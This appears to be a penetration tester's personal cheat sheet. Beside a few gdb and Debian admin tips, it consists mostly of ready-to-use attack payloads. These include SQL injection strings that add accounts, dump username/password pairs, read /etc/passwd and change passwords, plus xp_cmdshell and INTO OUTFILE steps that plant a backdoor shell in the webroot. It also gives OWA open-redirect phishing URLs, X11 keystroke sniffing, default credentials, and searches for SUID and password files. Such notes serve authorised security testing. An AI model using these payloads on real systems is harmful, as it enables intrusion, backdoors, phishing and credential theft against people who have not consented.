Debugging by filename from scratch: $ sudo gdb /usr/sbin/programname on already-running process: $ sudo gdb /usr/sbin/programname 4860 self-explanatory: (gdb) run (gdb) generate-core-file (gdb) detach print stack (equivalent to 'backtrace' or 'bt' command): (gdb) where print lines of source code (gdb) list register values (gdb) info reg Hint: install relevant debug symbols package useful links: http://dirac.org/linux/gdb/01-Introduction.php https://wiki.ubuntu.com/DebuggingProgramCrash http://www.digilife.be/quickreferences/QRC/GDB%20Quick%20Reference.pdf SQLi (mainly MSSQL and MySQL) add flag as PoC: CREATE TABLE pentester(was char(5),here char(5)) Verify by getting no errors (if vuln is error-based SQLi) when submitting a well-constructed query. i.e.:
http://target.foo/vuln.asp?id=1;SELECT * FROM pentester-- if the table was NOT created successfully, then you should get an error like:
Invalid object name "pentester" add new account even if single and/or double quotation marks are filtered. Integers are converted to strings, so in this case the added username and password would be "666" (without quotation marks):
INSERT INTO users (user_id, username, password) VALUES (666,666,666)-- i.e.:
http://target.foo/vuln.asp?id=1;INSERT%20INTO%20users%20(user_id,%20username,%20password)%20VALUES%20(666,666,666)-- Traverse to table other than current one, and enumerate column names:
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20having%201=1-- Returns:
users.USER_ID http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id%20having%201=1-- Returns:
users.USERNAME http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id,username%20having%201=1-- Returns:
users.PASSWORD And so on until no more similar SQL errors are returned
Get actual records. Note: SELECTed integers are dummy values to match the number of queried columns from the pre-UNION+SELECT statement: http://target.foo/vuln.php?id=1+union+select+concat(username,0x3a,password),2,3,4,5,6,7+from+users--Note: SQL server does not support the concat() function. Use the plus '+' operator instead. Enable xp_cmdshell. Will only work if you have sa/dbo rights. Useful for SQL 2005 server: EXEC master.dbo.sp_configure "show advanced options", 1 Then write your backdoor shell code on webroot. i.e.: EXEC master..xp_cmdshell "echo EVIL_CODE_HERE>d:\inetpub\wwwroot" Save arbitrary content on filesystem (useful to achieve remote command execution on MySQL servers): SELECT "evil content" INTO OUTFILE "/path/to/backdoor.php";Get user: or 1=convert(int,(USER))-- Get sa hash on MS SQL 2005:
SELECT password_hash FROM sys.sql_logins where name='sa' Get file contents ('/etc/passwd' in this case):
SELECT load_file('/etc/passwd');Use double quotes if single quotes are filtered:SELECT load_file("/etc/passwd");If both single and double quotes are filtered, then hex-encode filename. Note: you can use CAL9000 "straight" hex encoder to retrieve other filenames (don't forget to prepend hex string with '0x'):SELECT load_file(0x2F6574632F706173737764); Examples of interesting payloads (useful for blind SQLi):
UPDATE users SET password="1234" WHERE id=1;If target table is not on current database, then specify database name the target table belongs to: UPDATE dbname.users SET password="1234" WHERE id=1;Blind SQLi delay test: waitfor delay '0:0:10'; Don't forget to test variations which depend of where the payload is injected in the original SQL statement. i.e.:
http://target.foo/vuln.asp?id=1%27);waitfor%20delay%20%270:0:10%27-- Blind SQLi boolean test: AND 1=1versus: AND 1=0i.e.: http://target.foo/vuln.asp?id=1+AND+1=1Compare responses. i.e.: different content length, different errors in HTTP headers, etc. Location of MySQL user hashes: table 'user' within 'mysql' database. i.e.: SELECT Host,User,Password FROM mysql.user;Location of *all* MySQL database names and table names: table 'TABLES' within the 'information_schema' database . i.e.: SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES; Useful resources: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://michaeldaw.org/sql-injection-cheat-sheet/ http://pentestmonkey.net/index.php?option=com_content&task=category§ionid=9&id=24&Itemid=1 http://www.toorcon.org/tcx/9_McCray.pdf http://www.ngssoftware.com/papers/advanced_sql_injection.pdf Command-line tools: http://sqlmap.sourceforge.net/ http://sqlsus.sourceforge.net/ Debian/Ubuntu/GNU Linux
Search for package names based on keywords: $sudo apt-cache search "Text-to-search" i.e.: $ sudo apt-cache search "mysql" Example of network settings:
$ cat /etc/network/interfaces Finding world-writable files and directories # find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; 2>/dev/null >writable.txtFinding setuid files # find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txtReferences: http://www.gentoo.org/doc/en/security/security-handbook.xml?part=1&chap=6 Change DNS server settings permanently so they are not overwritten via DHCP: - edit /etc/dhcp3/dhclient.conf - uncomment supersede statement with desired settings. i.e.: supersede domain-name-servers 208.67.222.222,208.67.220.220; - restart networking. i.e.: sudo /etc/init.d/networking restart Outlook Web Access (OWA) 2003
Exchange admin: https://webmail.target.foo/exadmin/ Cross-domain redirect (redirect happens after clicking on "Log on", even if credentials are invalid): https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=http://webmail.target.foo.fake.com/ For the following redirect, the credentials must be valid: https://webmail.target.foo/exchweb/bin/redir.asp?URL=http://webmail.target.foo.fake.com/ VBScript error by assigning a string to the 'reason' parameter (expects a numeric value): https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?reason=abc Error returned in HTML: Microsoft VBScript runtime error '800a000d' Type mismatch: '[string: "abc"]' /exchweb/bin/auth/usa/logon.asp, line 542 Error returned in HTTP headers:
500 Internal Server Error Advanced phishing: will show the fake login page after logging in while still on the legitimate site. syntax: https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/<victim_username>/Inbox/<email_subject>.EML/1_multipart_xF8FF_2_<html_attachment_filename> i.e.: https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/pgriffin/Inbox/OWA%20LOGON.EML/1_multipart_xF8FF_2_fake_login.html More info here: http://www.gnucitizen.org/blog/owning-outlook-web-access-owa-users/ Infrastructure pentesting smb test cracked/found password via SMB: smbclient \\\\targethost\\ipc$ -U username password x11
packages required for xkey.c: libxt-dev and probably x11proto-core-dev if target is missconfigured and allows connections from any hosts. i.e.: $ xhost + then we can: $ export DISPLAY=server-host-name:0.0 remember to try different display numbers:
declare -x DISPLAY="10.10.3.11:1.0" etc ... Depends on open ports. i.e.: display 1 on tcp/6000, display 2 on tcp/6001 and so on. Then have fun with X tools. i.e.: xkey, xtv, etc ... Compaq Insight Manager - now known as HP System Management default passwords: anonymous/<none>default login URL: http://target.foo:2301/cpqlogin.htm find hosts allowing null sessions in subnet $ echo -en "\n" > returnchar.txt Windows tricks/useful commands
find files containing a certain string in their name (case insensitive search):
dir \ /s /b | find /I "password"find files containing a certain string (case insensitive search): findstr /i /s "password" \* |
|
|
|
Projects >
Cheatsheets |